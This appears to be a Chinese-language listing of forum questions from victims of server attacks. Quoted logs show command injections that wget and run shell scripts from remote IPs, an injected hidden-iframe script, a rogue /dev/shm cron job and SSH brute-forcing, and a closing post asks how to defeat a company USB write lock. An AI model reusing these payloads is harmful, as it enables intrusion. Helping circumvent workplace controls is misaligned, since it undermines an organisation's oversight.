标签: hacking

我有一台运行 Ubuntu 10.04LTS 的服务器（我知道它太旧了），在过去的几周里，它有时对网络流量没有响应，并且需要在早上第一件事（办公室开放时的上午 9 点）进行硬重置.

我查看了 kern.log 并注意到了一个模式。

发生这种情况后，通常会有来自传入外部 ip 地址的 UFW 块、CIFS VFS 错误、来自不同 ip 地址的另一个 UFW 块，然后在重新启动之前不会记录任何内容。我不确定这是否意味着服务器崩溃并停止记录，或者日志是否已关闭或清理。

外部 IP 地址每次都不同。

示例日志：

Feb 19 01:46:43 Server1 kernel: [139893.285676] [UFW BLOCK] IN=eth0 OUT= MAC=00:26:b9:2e:79:5c:3c:81:d8:44:41:00:08:00 SRC=50.30.32.186 DST=10.0.0.1 LEN=52 TOS=0x00 PREC=0x00 TTL=107 ID=2976 DF PROTO=TCP SPT=57588 DPT=80 WINDOW=8192 RES=0x00 CWR ECE SYN URGP=0 
Feb 19 02:57:20 Server1 kernel: [144130.370015]  CIFS VFS: No response for cmd 50 mid 52893
Feb 19 02:57:21 Server1 kernel: [144130.760010]  CIFS VFS: No response to cmd 4 …

我正在构建一个新服务器Apache，实际上我正在学习，所以我正在尝试不同的东西。我的安全系统已经完成，但当然我可能会遗漏一些东西，或者，如果没有，我明白今天没有任何系统可以 100% 保护我。那么，为什么我认为有人尝试过我，只是因为我在日志中收到了以下信息：

1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"

41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566

还有更多。我知道有人收到错误 400，这对我来说还不错。所以，实际上我的问题不是他们是否尝试我，因为我认为是，因为这似乎不是对我网站的正常请求。我想得到这个请求的解释来理解和学习。他们实际上想做什么，找到我的登录系统并将其发送给某个人？

PS我已经知道wget你可以下载一些网站，我还发现这login.cgi是一个基于cookie的身份验证程序。

谢谢！

我有个问题。

有人试图进入我的服务器，而且这种情况经常发生。例如：

Aug 19 14:11:42 oplot sshd[18373]: input_userauth_request: invalid user oracle
Aug 19 14:11:42 oplot sshd[18372]: pam_unix(sshd:auth): check pass; user unknown
Aug 19 14:11:42 oplot sshd[18372]: pam_unix(sshd:auth): authentication failure;
    logname= uid=0 euid=0 tty=ssh ruser= rhost=211.38.137.44 
Aug 19 14:11:44 oplot sshd[18372]: Failed password for invalid user oracle from
    211.38.137.44 port 36 841 ssh2
Aug 19 14:11:45 oplot sshd[18373]: Received disconnect from 211.38.137.44: 11:
    Bye Bye
Aug 19 14:11:47 oplot sshd[18374]: Invalid user test from 211.38.137.44
Aug 19 14:11:47 oplot sshd[18375]: input_userauth_request: …

我最近被黑了。黑客似乎将我服务器上的任何站点重定向到一个虚假的病毒站点。所以我删除了我所有的网站文件，黑客似乎消失了。大约一周后，它又回来了——还是一样的。我从未删除我的数据库，也从未上传使用它们的网站。在没有任何网站链接的情况下，单独的数据库是否有可能以某种方式支持黑客攻击？

我今天登录我的服务器，在我的目录浏览窗口顶部看到以下无法识别的代码：

document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[由作者编辑，此处未知 URL]";

我不认识 URL（我已将其删除）。

另外，我的phpBB3留言板顶部有一些phpBB调试和PHP通知，对我来说都是新的。此外，论坛代码中的某些链接似乎已被垃圾字符损坏。

没有添加或删除其他内容，但这引起了我的主要担忧。

我网站上的每个页面都受到 Apache 登录提示的保护，我认为这是足够的保护。

我是被攻击了，还是在阴影中跳跃？

可能重复：
我的服务器被黑了 紧急情况

我的网站被黑了，虚拟服务器上的所有网站也被黑了。我需要知道他们是怎么进来的。

他们在所有 index.php 文件中更改的代码如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
<html> 
<head> 
<title>hacked by jago-dz</title> 
<meta name="generator" content="Web Page Maker (unregistered version)"> 
<style type="text/css"> 
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: …

我已经阅读了以下没有回答我的问题的帖子：
-我的 linux 服务器被黑了。我如何知道它是如何以及何时完成的？
-我如何知道我的 Linux 服务器是否被黑客入侵？
- 以及更多...

服务器设置是这样的：
- Ubuntu 服务器在路由器（Cisco EA6500）之后并且没有端口转发（启用了 uPNP）。
- 最愚蠢的想法是让一个用户user使用密码呼叫user。

今天我进入了通过 ssh 连接的 php webeditor 并且没有接受密码。我发现服务器可能已被黑客入侵。

我发现以下内容：
-所有服务器文件的时间戳都更改为我上次登录的日期（今天）
-/dev/shm/- /.ICE-UNIX/update >/dev/null 2>&1 周五添加了一个 cronjob
- ubuntu 启动时出现错误，提示“错误变量 ROOT 未设置”

我做了什么：
- 通过恢复控制台恢复密码
- 设置一个小型防火墙，它尝试进入 ssh。

问题：
- 我怎么知道发生了什么变化？
- 如果没有 ssh 端口暴露，他们是如何进入的？

后来的编辑： 他们保留了完整的日志，我发现他们通过 ssh 输入并更改了密码。过去几周有很多 ssh 登录尝试。我重新安装了系统，移动了端口，安装了防火墙，我正在检查路由器。它肯定有安全漏洞。谢谢你们！

我们是一家为客户提供托管服务的公司，从来没有遇到过问题。现在，第二个客户站点在一周内被“入侵”。我们的密码应该是安全的，我们经常更改它们，相反我认为使用了后门。一个站点是旧的 Joomla！版本。（从 2010 年开始）。我们已经关闭了它，但现在我们收到了来自提供商的滥用邮件，因为另一个站点被“黑客入侵”。这是一个 wordpress 安装（相当新的版本，可能是 2-3 个月大。据我所知，有一个 zipfilenca.zip被注入到根文件夹中，并且以某种方式被提取。所有 Wordpress 文件仍然存在。

有谁知道如何防止这种情况？

我非常担心。我有一个小型网络服务器，托管一个 PhpMyAdmin 页面（其中有一些重要的数据库）。昨天，我在我的服务器上发布了一个完整的新网页（但是一个非常简单的 HTML 和样式表页面，没有任何世界不关心的东西）。我没有对任何人说过这件事。我只是用我母亲的计算机访问我的网站，向她展示该网站的外观。而且，从昨天开始，有非常非常奇怪的 IP 访问了我的网络服务器（我在 apache2 访问日志中看到它们）。

有些尝试访问甚至不存在的目录： 这是日志

这些目录 /home、/login/、/vpn 是什么？？？正如你所看到的，显然，他们向客户端返回了 404，但他为什么要尝试访问这个？而且，实际上这并不是很重要，因为其他一些 IP 尝试访问 PhpMyAdmin 大约 40 次。 就这个

而这才相当于这个家伙IP的50%。正如你所看到的，我尝试了所有可能的密码。幸运的是，我并不傻（笑），我设置了一个强密码（12 个字符，带有数字、标题..），但是如果有一天这个黑客有一天会怎样呢？因为我在网站上的所有帐户上使用相同的密码（幸运的是电子邮件除外）。我想看看这个人是从哪里来的。所以我在 iplocation.com 上搜索， 结果如下：

我的服务器上安装了fail2ban，但它仅适用于 ssh 和 apache。我还寻找放置 .htpasswd 文件，但我认为这仅适用于 apache 页面。

我真的很有压力，因为我的服务器非常非常小（四核 1.5GHz 和 4Gb RAM），当然它无法处理任何 DDoS 或其他任何情况。

我能做什么？设置fail2ban/第二个密码安全层是个好主意吗？我也使用这个服务器作为 VPN，并且经常使用 ssh。您认为黑客可能会监视我的活动并捕获我填写的用于访问 VPN 或 SSH 的密码吗？

这篇文章很长，我的英语很糟糕，所以感谢您花时间考虑我的问题

欢迎任何帮助

克莱门特

我使用的是笔记本电脑，Dell630，Window XP。按照我公司的政策，计算机正在运行守护程序来锁定 USB 端口。USB 设备只能读取，不能写入。所以我想让它也能写。知道如何使它成为 USB 可写的吗？

谢谢